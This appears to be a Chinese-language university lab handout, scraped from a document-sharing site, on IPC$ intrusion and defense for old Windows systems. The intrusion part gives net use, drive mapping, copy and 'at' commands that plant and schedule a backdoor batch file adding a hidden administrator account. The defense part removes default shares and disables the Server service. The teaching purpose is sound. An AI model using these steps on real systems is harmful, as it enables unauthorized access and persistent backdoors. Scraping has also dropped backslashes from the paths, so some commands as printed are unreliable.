IPC$入侵防御实验.doc

《IPC$入侵防御实验.doc》由会员分享，可在线阅读，更多相关《IPC$入侵防御实验.doc（12页珍藏版）》请在得力文库 - 分享文档赚钱的网站上搜索。

1、,IPC$入侵和防范实验一、 试验目的：学习使用windows系统自带IPC$有关的的网络管理和控制命令，巩固对所学知识的理解。 二、试验内容：通过使用windows系统自带的IPC$有关的网络管理和控制命令，观看其结果并进行分析，加深对这些工具的理解和灵活运用。三、试验环境： （1）安装WINDOWS NT 或WINDOWS 2000以上版本的操作系统。 （2）已开放IPC$共享。 （3）已知远程主机IP地址。 （4）已知远程主机的管理员帐号和密码（IPC$空连接除外） 其中远程主机所需条件： 1、安装WINDOWS NT 或WINDOWS 2000以上版本的操作系统。 2、已开放IPC$共

2、享。 3、已启动SERVER服务。四、试验步骤： 启动命令行控制台（虚拟机和本地机） 单击“开始”“运行”，在“运行”对话框中键入：“CMD“命令启动命令行控制台。 查看IPC$共享是否开放：CmdNet share 在虚拟机上建立用户，并把用户加入administators组中 Net user 用户名 密码 /add Net localgroup administrators 用户名/add Net localgroup adminstrators 建立IPC$连接 在命令行提示符下键入如下命令： Net use IP地址ipc$ “密码”/user:用户名如：Net use IP地址ip

3、c$ “12345”/user:administrator映射网络驱动器 成功建立了IPC$连接后，在命令行提示符下键入命令： Net use 本地盘符 IP地址共享名如：Net use z: 192.168.1.3c$ 该命令的执行结果是将目标主机的C盘映射为本地机的z盘。映射成功后，就可以对目标主机进行操作和控制了。COPY文件 命令格式：Copy 本地文件的路径文件名 远程主机IP远程主机文件路径。如：Copy c:/bake.bat 192.168.1.3c$ 断开IPC$连接 在命令行提示符下键入命令： Net use IP地址IPC$/del思考：如果不知道远程主机的用户名和密码，

4、可以连接上远程主机吗？可以实现以上哪些操作？ 留后门 （1）打开记事本编写批处理程序 建立后门的批处理程序为： Net user sysdoor 12345 /add Net localgroup administrator sysdoor /add 其中“Net user sysdoor 12345 /add“命令添加密码为12345的帐号sysdoor。“Net localgroup administrator sysdoor /add” 命令则把sysdoor帐号添加到管理员组中去。 后门程序编写好后，需要起个名字，在我们的实验中将它取名为“bake.bat”。 （2）批处理程序建立好后

5、，我们通过IPC$将它拷贝到目标主机，命令格式为：Copy 本地文件的路径文件名 远程主机IP远程主机文件路径。 Copy c:/bake.bat 192.168.1.3c$ （3）在命令行提示符下键入命令：net time ip，查看系统时间 At 192.168.1.3 14:10 c:bake.bat 断开IPC$连接 在命令行提示符下键入命令： Net use 192.168.1.3IPC$ /del 这条命令的执行结果是断开与远程主机192.168.1.3的IPC$连接。我们也可以用Net use */del断开所有的连接。 IPC$空连接 如果我们要与远程主机192.168.1.3

6、建立IPC$空连接，则在命令行提示符下键入命令： Net use 192.168.1.3 “ ” /user: Ipc$防御试验二IPC$的安全解决方案 删除默认共享(1)在命令符下键入Net share 命令查看系统当前的默认共享。 (2)打开记事本，编写批处理程序，如下： Net share IPC$ /del Net share e$ /del Net share c$ /del Net share d$ /del(3) 保存为delshare.bat(4) 单击C:Documents and SettingsAdministrator开始菜单程序启动，将delshare.bat文件拷贝

7、到它的启动组中。做完前面的事情后，重新启动计算机，然后用Net share 命令验证一下系统中的默认共享资源是否已经被全部删除，如果没有，还有哪些？尝试在本地机中用Net use IP地址ipc$ “密码”/user:用户名的命令是否还能建立IPC$连接？ 关闭SERVER服务单击“控制面板”“管理工具”“服务”打开服务管理器，在服务列表中找到“Server”服务，用右键单击该服务，在弹出的菜单中选择”属性“，然后选择”禁止“选项就完成了关闭操作。重启计算机后修改生效。再次验证：尝试在本地机中用Net use IP地址ipc$ “密码”/user:用户名的命令是否还能建立IPC$连接？如果不能

8、，将返回什么错误信息。 给系统设置一个安全的密码IPC$入侵一般都是通过扫描弱口令开始的，一旦入侵者扫描不到任何口令，IPC$入侵就无从谈起。1. 启动命令行控制台（虚拟机和本地机）2. 查看IPC$共享是否开放：3.在虚拟机上建立用户，并把用户加入administators组中4.建立IPC$连接5.映射网络驱动器6.COPY文件7. 断开IPC$连接 8 .(1)打开记事本编写批处理程序,建立后门的批处理程序.（2）批处理程序建立好后，我们通过IPC$将它拷贝到目标主机（3）在命令行提示符下键入命令：net time ip，查看系统时间(4) 断开IPC$ 连接(5)Net use */del断开所有的连接。(6)IPC$空连接Ipc$防御试验二IPC$的安全解决方案1.删除默认共享(1)在命令符下键入Net share 命令查看系统当前的默认共享。(2)打开记事本，编写批处理程序 (3) 保存为delshare.bat(4)将delshare.bat文件拷贝到它的启动组中。(5) 重新启动计算机，然后用Net share 命令(6)验证一下命令是否还能建立IPC$连接？7.1关闭SERVER服务7.2再次验证命令是否还能建立IPC$连接？如果不能，将返回什么错误信息。8.给系统设置一个安全的密码